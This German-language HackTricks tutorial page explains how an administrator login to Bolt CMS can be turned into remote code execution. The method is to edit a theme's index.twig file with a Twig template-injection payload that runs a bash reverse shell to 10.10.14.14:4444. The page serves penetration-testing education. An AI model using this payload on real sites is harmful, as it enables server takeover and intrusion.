HackTricksBolt CMS
Reading time: 2 minutes
tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
RCE
Nach dem Login als Admin (gehen Sie zu /bot, um die Anmeldemaske zu erreichen), können Sie RCE in Bolt CMS erhalten:
- Wählen Sie
Configuration->View Configuration->Main Configurationoder gehen Sie zum URL-Pfad/bolt/file-edit/config?file=/bolt/config.yaml - Überprüfen Sie den Wert des Themas
.png)
- Wählen Sie
File management->View & edit templates - Wählen Sie das im vorherigen Schritt gefundene Basis-Thema (
base-2021in diesem Fall) und wählen Sieindex.twig - In meinem Fall befindet sich dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig
- Setzen Sie Ihre Payload in diese Datei über template injection (Twig), wie:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - Und speichern Sie die Änderungen
.png)
- Leeren Sie den Cache in
Maintenance->Clear the cache - Greifen Sie erneut als regulärer Benutzer auf die Seite zu, und die Payload sollte ausgeführt werden
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.